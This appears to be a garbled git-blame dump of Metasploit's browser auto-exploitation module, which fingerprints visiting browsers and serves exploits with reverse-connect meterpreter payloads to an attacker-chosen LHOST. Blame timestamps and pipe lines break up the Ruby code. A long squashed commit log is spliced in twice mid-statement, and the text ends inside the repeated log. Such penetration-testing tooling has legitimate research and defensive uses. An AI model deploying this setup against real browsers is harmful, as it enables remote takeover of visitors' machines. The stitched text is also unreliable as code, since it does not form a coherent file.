2008-07-01 01:44:56 +00:00
|
|
|
##
|
2008-11-17 07:53:44 +00:00
|
|
|
# $Id$
|
2008-07-01 01:44:56 +00:00
|
|
|
##
|
|
|
|
|
|
|
|
##
|
2010-04-30 08:40:19 +00:00
|
|
|
# This file is part of the Metasploit Framework and may be subject to
|
2008-07-01 01:44:56 +00:00
|
|
|
# redistribution and commercial restrictions. Please see the Metasploit
|
2012-02-21 01:40:50 +00:00
|
|
|
# web site for more information on licensing and terms of use.
|
|
|
|
# http://metasploit.com/
|
2008-07-01 01:44:56 +00:00
|
|
|
##
|
|
|
|
|
2009-07-22 20:14:35 +00:00
|
|
|
# ideas:
|
|
|
|
# - add a loading page option so the user can specify arbitrary html to
|
|
|
|
# insert all of the evil js and iframes into
|
|
|
|
# - caching is busted when different browsers come from the same IP
|
2008-07-01 01:44:56 +00:00
|
|
|
|
|
|
|
require 'msf/core'
|
2009-07-22 20:14:35 +00:00
|
|
|
require 'rex/exploitation/javascriptosdetect'
|
2011-06-03 00:36:26 +00:00
|
|
|
require 'rex/exploitation/jsobfu'
|
2008-07-01 01:44:56 +00:00
|
|
|
|
2008-10-02 05:23:59 +00:00
|
|
|
class Metasploit3 < Msf::Auxiliary
|
2008-07-01 01:44:56 +00:00
|
|
|
|
2008-10-02 05:23:59 +00:00
|
|
|
include Msf::Exploit::Remote::HttpServer::HTML
|
2010-04-30 08:40:19 +00:00
|
|
|
|
2008-07-01 01:44:56 +00:00
|
|
|
def initialize(info = {})
|
2010-04-30 08:40:19 +00:00
|
|
|
super(update_info(info,
|
2008-08-08 06:00:30 +00:00
|
|
|
'Name' => 'HTTP Client Automatic Exploiter',
|
2008-10-23 02:43:21 +00:00
|
|
|
'Version' => '$Revision$',
|
2008-07-01 01:44:56 +00:00
|
|
|
'Description' => %q{
|
2011-05-20 09:11:43 +00:00
|
|
|
This module has three actions. The first (and the default)
|
|
|
|
is 'WebServer' which uses a combination of client-side and
|
|
|
|
server-side techniques to fingerprint HTTP clients and then
|
|
|
|
automatically exploit them. Next is 'DefangedDetection' which
|
|
|
|
does only the fingerprinting part. Lastly, 'list' simply
|
|
|
|
prints the names of all exploit modules that would be used by
|
|
|
|
the WebServer action given the current MATCH and EXCLUDE
|
|
|
|
options.
|
2011-11-20 02:12:07 +00:00
|
|
|
|
2011-05-20 09:11:43 +00:00
|
|
|
Also adds a 'list' command which is the same as running with
|
|
|
|
ACTION=list.
|
2010-08-07 06:59:16 +00:00
|
|
|
},
|
2010-04-30 08:40:19 +00:00
|
|
|
'Author' =>
|
2008-08-08 06:00:30 +00:00
|
|
|
[
|
2009-07-22 20:14:35 +00:00
|
|
|
# initial concept, integration and extension of Jerome
|
|
|
|
# Athias' os_detect.js
|
|
|
|
'egypt',
|
2008-07-22 07:28:05 +00:00
|
|
|
],
|
2008-07-01 01:44:56 +00:00
|
|
|
'License' => BSD_LICENSE,
|
|
|
|
'Actions' =>
|
|
|
|
[
|
2009-07-22 20:14:35 +00:00
|
|
|
[ 'WebServer', {
|
2010-04-30 08:40:19 +00:00
|
|
|
'Description' => 'Start a bunch of modules and direct clients to appropriate exploits'
|
2009-07-22 20:14:35 +00:00
|
|
|
} ],
|
2009-08-06 05:56:24 +00:00
|
|
|
[ 'DefangedDetection', {
|
2010-04-30 08:40:19 +00:00
|
|
|
'Description' => 'Only perform detection, send no exploits'
|
2009-08-06 05:56:24 +00:00
|
|
|
} ],
|
2010-04-30 08:40:19 +00:00
|
|
|
[ 'list', {
|
2009-07-22 20:14:35 +00:00
|
|
|
'Description' => 'List the exploit modules that would be started'
|
|
|
|
} ]
|
2008-07-01 01:44:56 +00:00
|
|
|
],
|
2010-04-30 08:40:19 +00:00
|
|
|
'PassiveActions' =>
|
2009-08-06 05:56:24 +00:00
|
|
|
[ 'WebServer', 'DefangedDetection' ],
|
Squashed commit of the following:
commit 6a3ad1d887df9d277e4878de94f8700ed8e404f9
Author: James Lee <egypt@metasploit.com>
Date: Wed May 9 16:22:49 2012 -0600
Add register_command calls for md5 and sha1
commit dbd52c5a1edfe1818a580d4d46aac0a9ca038e9c
Author: James Lee <egypt@metasploit.com>
Date: Wed May 9 16:22:09 2012 -0600
Read the file instead of downloading it
commit 55b84ad8e2a8532b3f8520ccb1162169b8e9c056
Author: James Lee <egypt@metasploit.com>
Date: Wed May 9 15:27:11 2012 -0600
Re-compile linux meterp to support the loadlib api
commit d112e84e490aa30aa9533fb0bdb33a9713ce01a5
Author: James Lee <egypt@metasploit.com>
Date: Wed May 9 14:50:25 2012 -0600
Re-compile java meterp to support the loadlib api
commit c137187b346b708487245a849b95343223e4e7b0
Author: James Lee <egypt@metasploit.com>
Date: Wed May 9 14:44:10 2012 -0600
Don't try to get interfaces if this session doesn't implement it
commit 88bba1e6c360c5725c4174623f56bcb6d8b54228
Author: James Lee <egypt@metasploit.com>
Date: Wed May 9 14:38:17 2012 -0600
Remove debugging load
commit 02954cbf93e2a13da967780cb703103b3f83ecf4
Merge: d9ef256 88b35a3
Author: James Lee <egypt@metasploit.com>
Date: Wed May 9 12:06:53 2012 -0600
Merge branch 'rapid7' into feature/4905
Conflicts:
data/meterpreter/ext_server_stdapi.php
modules/exploits/windows/browser/adobe_flashplayer_flash10o.rb
commit d9ef2569b88ae8bce67f13316f6eff76311fd846
Author: James Lee <egypt@metasploit.com>
Date: Wed May 2 18:06:06 2012 -0600
PHP doesn't support rev2self
commit bf13ea0ff25541da07b8c099218e5ad7ea6ae8ba
Author: James Lee <egypt@metasploit.com>
Date: Tue May 1 18:21:59 2012 -0600
Add php support for returning new extension commands
commit 7e35f2d671d3797fc3fab12e54015387f44b0b33
Author: James Lee <egypt@metasploit.com>
Date: Tue May 1 16:03:26 2012 -0600
Reset CVE-2012-0507 back to master
Purges commits unrelated to this branch.
commit 86a77b3cd017e1e3a3f23d9fba3b9ed173761f80
Author: James Lee <egypt@metasploit.com>
Date: Tue May 1 15:59:35 2012 -0600
Revert "Make building the jar for cve-2012-0507 a bit easier"
This reverts commit 27ef76522ad10436ec785728445ed2cc0657f85f.
Conflicts:
external/source/exploits/CVE-2012-0507/Makefile
external/source/exploits/CVE-2012-0507/src/msf/x/PayloadX.java
commit 8c259fb779f736be16fe972215ddff1dd32fd0f3
Merge: fe2c273 1c03c2b
Author: James Lee <egypt@metasploit.com>
Date: Tue May 1 15:35:44 2012 -0600
Merge branch 'rapid7' into feature/4905
Conflicts:
data/meterpreter/ext_server_stdapi.jar
data/meterpreter/meterpreter.jar
external/source/meterpreter/java/src/meterpreter/com/metasploit/meterpreter/Meterpreter.java
modules/auxiliary/server/browser_autopwn.rb
commit fe2c273a6d840c67040d6c9e337f908204337e18
Merge: 8caff47 4e955e5
Author: James Lee <egypt@metasploit.com>
Date: Fri Apr 6 10:19:53 2012 -0600
Merge branch 'rapid7' into feature/4905
commit 8caff47d97469f1a5459c04461fd1098487ea514
Author: James Lee <egypt@metasploit.com>
Date: Thu Apr 5 17:51:18 2012 -0600
Fix requires to find the test library
commit 51c33574cee3c47f0b2900c388d3d1213dd0a90d
Author: James Lee <egypt@metasploit.com>
Date: Thu Apr 5 17:48:35 2012 -0600
Fix a load order problem with solaris post mods
commit 81b658362e5e6bdd215d18b53d14429d163aff72
Merge: adad2cf 6ef4257
Author: James Lee <egypt@metasploit.com>
Date: Thu Apr 5 15:43:19 2012 -0600
Merge branch 'master' into feature/4905
commit 6ef42579471c6fde4bba71d0d4ce2c6c3e836180
Merge: 70ab8c0 5852455
Author: James Lee <egypt@metasploit.com>
Date: Thu Apr 5 15:16:56 2012 -0600
Merge branch 'rapid7'
Conflicts:
lib/rex/exploitation/javascriptosdetect.rb
commit adad2cf04c501c2a787e5475b62abd31871c06a0
Author: James Lee <egypt@metasploit.com>
Date: Thu Mar 29 20:20:21 2012 -0600
Deal with null data/jar
Not sure why "" turns into null sometimes, but it was breaking shells;
this fixes it.
commit 4f8a437b490e2b2774f9efd23b4891eaf007cf16
Author: James Lee <egypt@metasploit.com>
Date: Thu Mar 29 18:10:59 2012 -0600
Prev commit moved these to src/a
commit 27ef76522ad10436ec785728445ed2cc0657f85f
Author: James Lee <egypt@metasploit.com>
Date: Thu Mar 29 18:08:32 2012 -0600
Make building the jar for cve-2012-0507 a bit easier
Mostly stolen from cve-2008-5353
commit db3dbad0a5ff20b05758be073c3502138ff095c2
Author: James Lee <egypt@metasploit.com>
Date: Thu Mar 29 14:52:23 2012 -0600
Fix incorrect option name
commit 776976af31795bdf1b405e208a2d4b78a6b6c2cf
Author: James Lee <egypt@metasploit.com>
Date: Wed Mar 28 15:36:20 2012 -0600
Add bap support to java_rhino
commit a611ab16e06bd324d6616d0bd69f2c09d671bca0
Author: James Lee <egypt@metasploit.com>
Date: Wed Mar 28 15:35:16 2012 -0600
Put next_exploit on the window object so it's always in scope
Solves some issues with Chrome not running more than one exploit
commit 5114d35de7c2f234ac7fe4288b344d4f2bb9731f
Author: James Lee <egypt@metasploit.com>
Date: Tue Mar 27 14:31:53 2012 -0600
Pull common stuff up out of the body
commit 748309465a029593e2fe2fd445149745367513f4
Author: James Lee <egypt@metasploit.com>
Date: Tue Mar 27 11:04:03 2012 -0600
Fix indentation level
commit 954d485e3b8ffea9a7451bd495c1956a098e0eda
Author: James Lee <egypt@metasploit.com>
Date: Tue Mar 27 11:02:42 2012 -0600
Abstract out copy-pasted methods
Need to do the same thing for OSX, but it's a different implementation.
commit cba8d7c911fb184f6358948022fd4a0e010878d0
Author: James Lee <egypt@metasploit.com>
Date: Fri Mar 23 18:04:50 2012 -0600
Linux doesn't implement (drop|steal)_token
commit 1cfda3a7b045c08ecfae1ad688e0124e76bd0c8f
Author: James Lee <egypt@metasploit.com>
Date: Fri Mar 23 17:57:37 2012 -0600
Add availability checks for net, sys, ui, and webcam
commit 4bdf39a8bf4b5aab293fc47cb8282d0346db0811
Author: James Lee <egypt@metasploit.com>
Date: Fri Mar 23 16:45:59 2012 -0600
add requirement checking for fs and core commands
commit 42e35971c9f7348b57293b2b94a42dd0260ac7e4
Author: James Lee <egypt@metasploit.com>
Date: Wed Mar 21 17:20:59 2012 -0600
Add a to_octal method that converts e.g. "A" to \0101
commit c3b9415a0a9e2b55b1effbaf2396e11f88301aaa
Author: James Lee <egypt@metasploit.com>
Date: Wed Mar 21 17:20:07 2012 -0600
Don't use "echo -n"
It's not portable
commit b0f3ceccfaedbeaf67fbbe76f1a0a9aec7b44548
Author: James Lee <egypt@metasploit.com>
Date: Tue Mar 20 17:01:10 2012 -0600
Return a list of new commands after core_loadlib, java version
Thanks mihi for the patch and the awesome responsiveness!
commit d65303e1b6458bd4b95138dc0d61e5354c4e8d3a
Author: James Lee <egypt@metasploit.com>
Date: Tue Mar 20 13:21:06 2012 -0600
Make sure we have a response before doing stuff with it
commit 721001ead474a17d1a16de543f78b548879f5e7e
Author: James Lee <egypt@metasploit.com>
Date: Mon Mar 19 21:25:31 2012 -0600
Add missing rmdir and mkdir protocol commands to PHP
Now passes all the stdapi tests that it can
[*] Session type is meterpreter and platform is php/php
[+] should return a user id
[+] should return a sysinfo Hash
[-] FAILED: should return network interfaces
[-] Exception: Rex::Post::Meterpreter::RequestError : stdapi_net_config_get_interfaces: Operation failed: 1
[-] FAILED: should have an interface that matches session_host
[-] Exception: Rex::Post::Meterpreter::RequestError : stdapi_net_config_get_interfaces: Operation failed: 1
[-] FAILED: should return network routes
[-] Exception: Rex::Post::Meterpreter::RequestError : stdapi_net_config_get_routes: Operation failed: 1
[+] should return the proper directory separator
[+] should return the current working directory
[+] should list files in the current directory
[+] should stat a directory
[+] should create and remove a dir
[+] should change directories
[+] should create and remove files
[+] should upload a file
[-] Passed: 10; Failed: 3
commit 024e99167a025f4678a707e1ee809a1524007d4d
Author: James Lee <egypt@metasploit.com>
Date: Mon Mar 19 15:26:00 2012 -0600
Use a proper TLV type instead of a generic one
commit 1836d915cbe0bfd2f536a667e74d8d6a6ccee72a
Author: James Lee <egypt@metasploit.com>
Date: Mon Mar 19 15:24:25 2012 -0600
Fix a counting error that caused segfaults (Linux)
commit 1e419d3fc392e435ae0af703561ce10bd5a45eb0
Author: James Lee <egypt@metasploit.com>
Date: Mon Mar 19 15:06:02 2012 -0600
Return a list of new commands after core_loadlib
Gets Windows back in sync with Linux
commit 3d3959f720de68e2f36ebfabe8196e01f98fe904
Author: James Lee <egypt@metasploit.com>
Date: Mon Mar 19 14:50:55 2012 -0600
Refactor extensionList -> extension_commands
It's not the same as extension_list.
commit a7acb638af803732fc5f3975e0c0632f427e0deb
Author: sinn3r <msfsinn3r@gmail.com>
Date: Sun Mar 18 00:07:27 2012 -0500
Massive whitespace cleanup
commit ef8b9fd5cea7db43860a5b88d7397ba84393ecd5
Author: sinn3r <msfsinn3r@gmail.com>
Date: Sat Mar 17 16:00:20 2012 -0500
Add back enum_protections with some new changes
commit d778eec36953bb9bf4985e967ad2c119a1acd79b
Author: ohdae <bindshell@live.com>
Date: Sat Mar 17 13:28:31 2012 -0400
Added fix for enum_protections
commit 64611819d43bf13ab2d68f4353513c39e5a64fe0
Author: sinn3r <msfsinn3r@gmail.com>
Date: Sat Mar 17 03:14:26 2012 -0500
A bunch of fixes
commit bb1a0205d73e75a61a8fbf5ff6440dd09f9780f9
Author: sinn3r <msfsinn3r@gmail.com>
Date: Sat Mar 17 00:28:05 2012 -0500
The comments in get_chatlogs need an update
commit 666477e42a734f3120dcc4282b01b5ab5819384a
Author: sinn3r <msfsinn3r@gmail.com>
Date: Sat Mar 17 00:25:41 2012 -0500
Correct license format
commit 3c8eecbcd7b952abaca0b1ce14dca41e1d4cabb7
Author: sinn3r <msfsinn3r@gmail.com>
Date: Sat Mar 17 00:22:03 2012 -0500
Add enum_adium.rb post module
commit d290cf4fef1309df9a1af748e7c6c259a6788576
Author: ohdae <bindshell@live.com>
Date: Fri Mar 16 16:54:36 2012 -0300
Changed store_note to store_loot. Fixed local/remote file retrieval
commit ccb830b594ea0f0a8ce7c29b24f2f137ecfd5c4c
Author: James Lee <egypt@metasploit.com>
Date: Fri Mar 16 11:29:07 2012 -0600
Fall back to MIB method if we can't get netmasks
Misses IPv6 addresses, but at least doesn't break everything.
[Fixes #6525]
commit a9a30232dd5fcc0854c10b4d58df8511a23f3091
Author: sinn3r <msfsinn3r@gmail.com>
Date: Fri Mar 16 11:49:31 2012 -0500
This module is not ready, yanked.
commit 6bb34f7fd0785d31902f1edc938a6b05b91a1495
Author: Gregory Man <man.gregory@gmail.com>
Date: Fri Mar 16 18:09:08 2012 +0200
sockso_traversal 1.8 compatibility fix
commit e76965ce565a8ae634dc0d3c743542f1a6d977d7
Author: ohdae <bindshell@live.com>
Date: Fri Mar 16 09:17:35 2012 -0400
fix
commit 61ce7b587de54363f7071bc19df5a29eb29e9aa7
Author: ohdae <bindshell@live.com>
Date: Fri Mar 16 09:14:48 2012 -0400
saves each config to loot instead of notes
commit f4713974fa82d8b13017cb0817b5fd36696194d9
Author: James Lee <egypt@metasploit.com>
Date: Fri Mar 16 03:46:10 2012 -0600
Check for a 0 prefix length
If the OnLinkPrefixLength is 0, something is wrong, try the value in the
prefix linked list. Appears to fix v4 addresses on XP but not 2k3.
[See #6525]
commit cde7fcc012e04880f2faa28226a1fc5834a2e3d5
Author: James Lee <egypt@metasploit.com>
Date: Fri Mar 16 01:46:41 2012 -0600
Return network prefixes when available
Solves #6525 on Vista+. Win2k still works using the old MIB method
(which doesn't support ipv6). Win2k3 and XP are still busted for
unknown reasons.
commit 98bd9a7bd09149f524ebbe1501ec916bf99b078d
Author: ohdae <bindshell@live.com>
Date: Thu Mar 15 22:59:42 2012 -0400
Enumerate important and interesting configuration files
commit 9336df2ac28ee2df10a0e66e7006df3d23493492
Author: David Maloney <David_Maloney@rapid7.com>
Date: Thu Mar 15 19:06:48 2012 -0500
More Virtualisation SSL fixes
commit f24c378281ee6c85f687d4823f09ef5848812daf
Author: David Maloney <David_Maloney@rapid7.com>
Date: Thu Mar 15 18:15:29 2012 -0500
Default SSL to true for esx_fingerprint module
commit d6e14c42120df0fd16b79709ac5723d0e2818810
Author: sinn3r <msfsinn3r@gmail.com>
Date: Thu Mar 15 15:56:24 2012 -0500
Fix typo
commit b24dcfe43e625740ec8a1465f33be02f7ec40162
Author: sinn3r <msfsinn3r@gmail.com>
Date: Thu Mar 15 15:55:54 2012 -0500
Add sockso dir traversal
commit 033052c1e075fcf43e9c17e5ee4a5006247cb375
Author: James Lee <egypt@metasploit.com>
Date: Thu Mar 15 14:31:25 2012 -0600
Fix syntax error in 1.8, thanks Jun Koi for the patch
commit 4529efaeaa22e52c9c7c1528c68efb60af8af729
Author: sinn3r <msfsinn3r@gmail.com>
Date: Thu Mar 15 14:27:40 2012 -0500
enum_protections is now find_apps
commit 49e823802bd8f2cb1940545e74db04f3788352d1
Author: sinn3r <msfsinn3r@gmail.com>
Date: Thu Mar 15 14:22:23 2012 -0500
File rename, as well as design and cosmetic changes
commit ccf6b011145cf9db444f7e2d3fb3ec61738e88cb
Author: ohdae <bindshell@live.com>
Date: Thu Mar 15 15:29:52 2012 -0300
added report_note, removed store_loot function, cleaned up info/author
commit 27d571932e51afbac0c0fcd95c52f038786a9a28
Author: ohdae <bindshell@live.com>
Date: Thu Mar 15 12:18:29 2012 -0300
fixed output newline issue
commit 5a828e35d1629dc68825fe7d9322d1316888f8d7
Author: ohdae <bindshell@live.com>
Date: Thu Mar 15 01:05:35 2012 -0300
fixed save line
commit 805c2ee9871c076a8c0ac62b028a7942af70b6a5
Author: ohdae <bindshell@live.com>
Date: Thu Mar 15 01:02:07 2012 -0300
removed unneeded comments
commit 5861e1512f2949c0d7848d9ebed8241277462085
Author: ohdae <bindshell@live.com>
Date: Thu Mar 15 01:00:55 2012 -0300
fixed output issue
commit 593a3648111f1db1f56a410250539261c2a7cd9f
Author: ohdae <bindshell@live.com>
Date: Wed Mar 14 18:26:53 2012 -0300
removed unneeded dependency
commit 05053e6e74b0ac99bbd4005c40ecc3b1196fd13f
Author: ohdae <bindshell@live.com>
Date: Wed Mar 14 13:30:16 2012 -0400
locates installed 3rd part av, fws, etc
commit 5bf512d0e9d2b412c4107228db178a7078111443
Author: sinn3r <msfsinn3r@gmail.com>
Date: Wed Mar 14 16:50:54 2012 -0500
Add OSVDB-79863 NetDecision Directory Traversal
commit 18715d0367f4ef01b5998d732043cbe224e1787e
Author: James Lee <egypt@metasploit.com>
Date: Wed Mar 14 23:03:01 2012 -0600
Store the retrieved commands on the session
commit b752cb8b31fd8dcd221fb6caa483f6202bf5a4fd
Author: James Lee <egypt@metasploit.com>
Date: Wed Mar 14 22:45:16 2012 -0600
Retrieve the list of new commands
The client side doesn't do anything with them yet
commit 69ce8ef42d4089a0b26644bd4d6bebf57c4cfd50
Author: James Lee <egypt@metasploit.com>
Date: Wed Mar 14 22:41:16 2012 -0600
Return a list of the new commands in response to core_loadlib
Linux
commit 354c754aa4cce63ffebb4567f3bbfd621ffef46c
Author: James Lee <egypt@metasploit.com>
Date: Wed Mar 14 15:13:45 2012 -0600
Whitespace at EOL
commit 4afcb4cb9da1921ede29b03b149433cc65d680da
Author: James Lee <egypt@metasploit.com>
Date: Wed Mar 14 14:30:09 2012 -0600
Create instance methods that return extensions
Before this change, meterpreter sessions would not #respond_to? their
extensions despite having a pseudo-accessor for them:
```
>> client.respond_to? :sys
=> false
>> client.sys
=> #<Rex::Post::Meterpreter::ObjectAliases:0x0000000e263488 @aliases={"config"=>#<Rex::Post::Meterpreter::Extensions::Stdapi::Sys::Config:0x0000000e268dc8 @client=#<Session:meterpreter 192.168.99.1:55882 (192.168.99.1) "uid=1000, gid=1000, euid=1000, egid=1000, suid=1000, sgid=1000 @ wpad">>, "process"=>#<Class:0x0000000e268d20>, "registry"=>#<Class:0x0000000e266da0>, "eventlog"=>#<Class:0x0000000e2654e8>, "power"=>#<Class:0x0000000e263c30>}>
```
After:
```
>> client.respond_to? :sys
=> true
```
commit 70ab8c018f67d15929b6f41322540837ab7b37c5
Merge: a8a3938 5f2bace
Author: James Lee <egypt@metasploit.com>
Date: Tue Apr 3 11:46:25 2012 -0600
Merge branch 'master' into bap-refactor
Conflicts:
external/source/exploits/CVE-2012-0507/Help.java
external/source/exploits/CVE-2012-0507/Makefile
external/source/exploits/CVE-2012-0507/msf/x/Help.java
external/source/exploits/CVE-2012-0507/src/a/Exploit.java
external/source/exploits/CVE-2012-0507/src/a/Help.java
commit a8a393891588a8b5c18e3c2173f1cd9c2480b2d0
Author: James Lee <egypt@metasploit.com>
Date: Thu Mar 29 20:20:21 2012 -0600
Deal with null data/jar
Not sure why "" turns into null sometimes, but it was breaking shells;
this fixes it.
commit 5e5eb39d3ccb62a9fc006be8241cfb97723caa06
Author: James Lee <egypt@metasploit.com>
Date: Thu Mar 29 18:10:59 2012 -0600
Prev commit moved these to src/a
commit 5074eadbea426fc4f83d6d165a01e640ef42b4de
Author: James Lee <egypt@metasploit.com>
Date: Thu Mar 29 18:08:32 2012 -0600
Make building the jar for cve-2012-0507 a bit easier
Mostly stolen from cve-2008-5353
commit bdb3fbe7fd19aa76b4069edca5a78c53fec668c0
Author: James Lee <egypt@metasploit.com>
Date: Thu Mar 29 14:52:23 2012 -0600
Fix incorrect option name
commit 78824ef60084510d3befe0ded6eed314d55eeb12
Author: James Lee <egypt@metasploit.com>
Date: Thu Mar 29 13:24:33 2012 -0600
Add the detected browser version to the DOM
Doing it this way lets modules grab the info a bit more easily.
commit 9813ccb8d6b14e0e728b8a13bacf59dd31b9c4b9
Merge: 0faa3f6 b5fc8e4
Author: James Lee <egypt@metasploit.com>
Date: Thu Mar 29 13:19:05 2012 -0600
Merge branch 'master' into bap-refactor
commit 0faa3f65240c3a2b3ab0e72f4aeb2e9f50ed54ee
Author: James Lee <egypt@metasploit.com>
Date: Wed Mar 28 15:36:20 2012 -0600
Add bap support to java_rhino
commit 66ca27f994e3b11c9c8adae85642820768158860
Author: James Lee <egypt@metasploit.com>
Date: Wed Mar 28 15:35:16 2012 -0600
Put next_exploit on the window object so it's always in scope
Solves some issues with Chrome not running more than one exploit
commit 7fc2ca1a0690c7a973307772aed42ab3514e1761
Merge: 325d306 e48c47e
Author: James Lee <egypt@metasploit.com>
Date: Wed Mar 28 15:10:54 2012 -0600
Merge branch 'master' into bap-refactor
commit 325d3060599bc79674e93dd5f55a4e60061e9bdb
Author: James Lee <egypt@metasploit.com>
Date: Tue Mar 27 14:31:53 2012 -0600
Pull common stuff up out of the body
commit 4f2b3260bf7f14f4d763625792adb0c3cfd1ed7c
Author: James Lee <egypt@metasploit.com>
Date: Tue Mar 27 11:04:03 2012 -0600
Fix indentation level
commit 9b905c53b4d46beb86da8168a1c2c5b2da340f6d
Author: James Lee <egypt@metasploit.com>
Date: Tue Mar 27 11:02:42 2012 -0600
Abstract out copy-pasted methods
Need to do the same thing for OSX, but it's a different implementation.
2012-05-15 23:00:02 +00:00
|
|
|
'DefaultOptions' => {
|
|
|
|
# We know that most of these exploits will crash the browser, so
|
|
|
|
# set the default to run migrate right away if possible.
|
|
|
|
"InitialAutoRunScript" => "migrate -f",
|
|
|
|
},
|
2008-07-01 01:44:56 +00:00
|
|
|
'DefaultAction' => 'WebServer'))
|
|
|
|
|
|
|
|
register_options([
|
2010-04-30 08:40:19 +00:00
|
|
|
OptAddress.new('LHOST', [true,
|
2009-07-22 20:14:35 +00:00
|
|
|
'The IP address to use for reverse-connect payloads'
|
2011-06-02 20:56:55 +00:00
|
|
|
])
|
2009-07-22 20:14:35 +00:00
|
|
|
], self.class)
|
|
|
|
|
|
|
|
register_advanced_options([
|
2010-07-12 05:19:38 +00:00
|
|
|
OptString.new('AutoRunScript', [false, "A script to automatically on session creation.", '']),
|
|
|
|
OptBool.new('AutoSystemInfo', [true, "Automatically capture system information on initialization.", true]),
|
2010-04-30 08:40:19 +00:00
|
|
|
OptString.new('MATCH', [false,
|
2009-07-22 20:14:35 +00:00
|
|
|
'Only attempt to use exploits whose name matches this regex'
|
|
|
|
]),
|
2010-04-30 08:40:19 +00:00
|
|
|
OptString.new('EXCLUDE', [false,
|
2009-07-22 20:14:35 +00:00
|
|
|
'Only attempt to use exploits whose name DOES NOT match this regex'
|
|
|
|
]),
|
2010-04-30 08:40:19 +00:00
|
|
|
OptBool.new('DEBUG', [false,
|
2009-07-22 20:14:35 +00:00
|
|
|
'Do not obfuscate the javascript and print various bits of useful info to the browser',
|
|
|
|
false
|
|
|
|
]),
|
2010-04-30 08:40:19 +00:00
|
|
|
OptPort.new('LPORT_WIN32', [false,
|
2011-01-20 20:32:18 +00:00
|
|
|
'The port to use for Windows reverse-connect payloads', 3333
|
|
|
|
]),
|
|
|
|
OptString.new('PAYLOAD_WIN32', [false,
|
|
|
|
'The payload to use for Windows reverse-connect payloads',
|
|
|
|
'windows/meterpreter/reverse_tcp'
|
2009-11-11 21:38:30 +00:00
|
|
|
]),
|
2010-04-30 08:40:19 +00:00
|
|
|
OptPort.new('LPORT_LINUX', [false,
|
2011-01-20 20:32:18 +00:00
|
|
|
'The port to use for Linux reverse-connect payloads', 4444
|
|
|
|
]),
|
|
|
|
OptString.new('PAYLOAD_LINUX', [false,
|
|
|
|
'The payload to use for Linux reverse-connect payloads',
|
|
|
|
'linux/meterpreter/reverse_tcp'
|
|
|
|
]),
|
|
|
|
OptPort.new('LPORT_MACOS', [false,
|
|
|
|
'The port to use for Mac reverse-connect payloads', 5555
|
2009-11-11 21:38:30 +00:00
|
|
|
]),
|
2011-01-20 20:32:18 +00:00
|
|
|
OptString.new('PAYLOAD_MACOS', [false,
|
|
|
|
'The payload to use for Mac reverse-connect payloads',
|
|
|
|
'osx/meterpreter/reverse_tcp'
|
2009-11-11 21:38:30 +00:00
|
|
|
]),
|
2010-04-30 08:40:19 +00:00
|
|
|
OptPort.new('LPORT_GENERIC', [false,
|
2011-01-20 20:32:18 +00:00
|
|
|
'The port to use for generic reverse-connect payloads', 6666
|
|
|
|
]),
|
|
|
|
OptString.new('PAYLOAD_GENERIC', [false,
|
Squashed commit of the following:
commit 6a3ad1d887df9d277e4878de94f8700ed8e404f9
Author: James Lee <egypt@metasploit.com>
Date: Wed May 9 16:22:49 2012 -0600
Add register_command calls for md5 and sha1
commit dbd52c5a1edfe1818a580d4d46aac0a9ca038e9c
Author: James Lee <egypt@metasploit.com>
Date: Wed May 9 16:22:09 2012 -0600
Read the file instead of downloading it
commit 55b84ad8e2a8532b3f8520ccb1162169b8e9c056
Author: James Lee <egypt@metasploit.com>
Date: Wed May 9 15:27:11 2012 -0600
Re-compile linux meterp to support the loadlib api
commit d112e84e490aa30aa9533fb0bdb33a9713ce01a5
Author: James Lee <egypt@metasploit.com>
Date: Wed May 9 14:50:25 2012 -0600
Re-compile java meterp to support the loadlib api
commit c137187b346b708487245a849b95343223e4e7b0
Author: James Lee <egypt@metasploit.com>
Date: Wed May 9 14:44:10 2012 -0600
Don't try to get interfaces if this session doesn't implement it
commit 88bba1e6c360c5725c4174623f56bcb6d8b54228
Author: James Lee <egypt@metasploit.com>
Date: Wed May 9 14:38:17 2012 -0600
Remove debugging load
commit 02954cbf93e2a13da967780cb703103b3f83ecf4
Merge: d9ef256 88b35a3
Author: James Lee <egypt@metasploit.com>
Date: Wed May 9 12:06:53 2012 -0600
Merge branch 'rapid7' into feature/4905
Conflicts:
data/meterpreter/ext_server_stdapi.php
modules/exploits/windows/browser/adobe_flashplayer_flash10o.rb
commit d9ef2569b88ae8bce67f13316f6eff76311fd846
Author: James Lee <egypt@metasploit.com>
Date: Wed May 2 18:06:06 2012 -0600
PHP doesn't support rev2self
commit bf13ea0ff25541da07b8c099218e5ad7ea6ae8ba
Author: James Lee <egypt@metasploit.com>
Date: Tue May 1 18:21:59 2012 -0600
Add php support for returning new extension commands
commit 7e35f2d671d3797fc3fab12e54015387f44b0b33
Author: James Lee <egypt@metasploit.com>
Date: Tue May 1 16:03:26 2012 -0600
Reset CVE-2012-0507 back to master
Purges commits unrelated to this branch.
commit 86a77b3cd017e1e3a3f23d9fba3b9ed173761f80
Author: James Lee <egypt@metasploit.com>
Date: Tue May 1 15:59:35 2012 -0600
Revert "Make building the jar for cve-2012-0507 a bit easier"
This reverts commit 27ef76522ad10436ec785728445ed2cc0657f85f.
Conflicts:
external/source/exploits/CVE-2012-0507/Makefile
external/source/exploits/CVE-2012-0507/src/msf/x/PayloadX.java
commit 8c259fb779f736be16fe972215ddff1dd32fd0f3
Merge: fe2c273 1c03c2b
Author: James Lee <egypt@metasploit.com>
Date: Tue May 1 15:35:44 2012 -0600
Merge branch 'rapid7' into feature/4905
Conflicts:
data/meterpreter/ext_server_stdapi.jar
data/meterpreter/meterpreter.jar
external/source/meterpreter/java/src/meterpreter/com/metasploit/meterpreter/Meterpreter.java
modules/auxiliary/server/browser_autopwn.rb
commit fe2c273a6d840c67040d6c9e337f908204337e18
Merge: 8caff47 4e955e5
Author: James Lee <egypt@metasploit.com>
Date: Fri Apr 6 10:19:53 2012 -0600
Merge branch 'rapid7' into feature/4905
commit 8caff47d97469f1a5459c04461fd1098487ea514
Author: James Lee <egypt@metasploit.com>
Date: Thu Apr 5 17:51:18 2012 -0600
Fix requires to find the test library
commit 51c33574cee3c47f0b2900c388d3d1213dd0a90d
Author: James Lee <egypt@metasploit.com>
Date: Thu Apr 5 17:48:35 2012 -0600
Fix a load order problem with solaris post mods
commit 81b658362e5e6bdd215d18b53d14429d163aff72
Merge: adad2cf 6ef4257
Author: James Lee <egypt@metasploit.com>
Date: Thu Apr 5 15:43:19 2012 -0600
Merge branch 'master' into feature/4905
commit 6ef42579471c6fde4bba71d0d4ce2c6c3e836180
Merge: 70ab8c0 5852455
Author: James Lee <egypt@metasploit.com>
